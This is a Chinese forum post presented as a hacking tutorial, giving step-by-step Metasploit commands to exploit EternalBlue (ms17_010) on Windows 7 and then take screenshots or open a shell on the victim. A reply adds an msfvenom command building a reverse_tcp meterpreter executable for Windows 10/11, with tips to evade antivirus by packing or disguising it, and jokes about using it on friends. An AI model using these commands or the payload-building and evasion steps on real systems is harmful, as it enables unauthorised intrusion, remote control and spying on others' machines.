用户:
PlumSteven查看:19 回复:25 评论:19 创建时间:2022-12-27T13:25:23
*本教程仅供学习,不可以用来害人啊!*
操作系统的教程我先不更,周末再更啊
这是一个黑客教程(想啥呢,不是教你搞病毒的!),今天我们来学一学利用永恒之蓝攻击Windows
永恒之蓝是啥?什么?这都不知道?它是一个利用Smb的漏洞来获取Windows最高权限(SYSTEM用户)的一个程序
比特币病毒总知道吧?就是用的永恒之蓝
不过好像只能搞Windows7哎。。。
那我们现在就开始吧!
首先安装开发环境啊,就是kali Linux(黑客工具自带一大堆),给大家展示我的(我的是美化过的):
自行去官网下载(他还贴心的为你准备了安装好的VMware和Vbox虚拟机~),或者自己去网上搜索
如果你是从官网下载的虚拟机,注意了!用户名和密码都是kali
搞好了之后,我们打开终端(没有人不会吧),就可以开始攻击啦!
我们用到的工具是msf(这个是简称,全称我忘了)
1.初始化数据库:msfdb init
2.启动msf控制台:msfconsole
msfconsole命令执行效果:
图案可能不一样(我见过一堆奇葩图案了)这个不重要
只要出现了msf6>就彳亍
接下来,我们想要知道永恒之蓝这个漏洞的名称,所以输入search ms17_010
即搜索ms17_010(自己去查询永恒之蓝就知道为什么是ms17_010了)
然后找到eternal_blue的那个选项,即为exploit/windows/喵b/ms17_010_eternalblue
然后use exploit/windows/喵b/ms17_010_eternalblue
就会出现这个:
恭喜你!完成了一大半了!
接下来我们要配置选项
输入show options
找到RHOSTS那一栏,这个就是受害者的IP
找到你的Windows7的IP地址,即在cmd输入ipconfig,然后找到那个Ipv4对应的东东
设置RHOSTS:set RHOSTS ***(你的IP地址)
然后你还可以设置LPORT(即收听端口,随你设置,只要是0~65535中没被占用的端口,默认4444),和上面方法一样,即为set LPORT ****(你想要的端口)
全部设置完毕后,就可以开始攻击了!
输入run或者exploit,时间可能会有点久(注意!被攻击的电脑要关闭防火墙并且外部可以ping通:即在你的Kali中新打开一个命令行,输入ping IP地址,如果能一直传输数据(大概这样额:*** bytes from *****),就是可以Ping通的。如果没法Ping通,自行去度娘那里搜索)
如果你成功了,就会看到以下界面
原谅我把ip涂掉了,防止你们拿我的电脑下黑手。。。
好了!你已经成功入侵了!
接下来。。。嘿嘿嘿
你可以shutdown关机,或者shell进入windows命令行为所欲为(别犯法啊!你自己的虚拟机和电脑没关系,别整喵那儿去了)
我的shutdown坏了,所以给你们看看其他的:
screenshot:截图命令
找到他给出的路径,看到多了一张图:

(免费监视器.jpg)
今天的教程就到这里了,拜拜~
PlumSteven好我顺便顶一下,win10和win11的方法如下:
也是打开msfconsole,不过这次不用选择模块
直接msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机地址 LPORT=这个端口随便选,和文中要求一样 -f exe -o 随便取个名字.exe
这样就生成了一个exe,放到靶机上面运行,然后在你的kali上面运行sessions查看中毒的机器,sessions -i 编号 就可以选择侵入哪个机器,这样就能得到windows的powershell,可以给你的好基友远程关机啦~
当然单单这样生成是会被s毒软件s的,这里建议给病毒套个加密壳,或者使用-x参数伪装成一个应用程序,这样就可以运行了。
附:文章中喵是s/m
点赞2
评论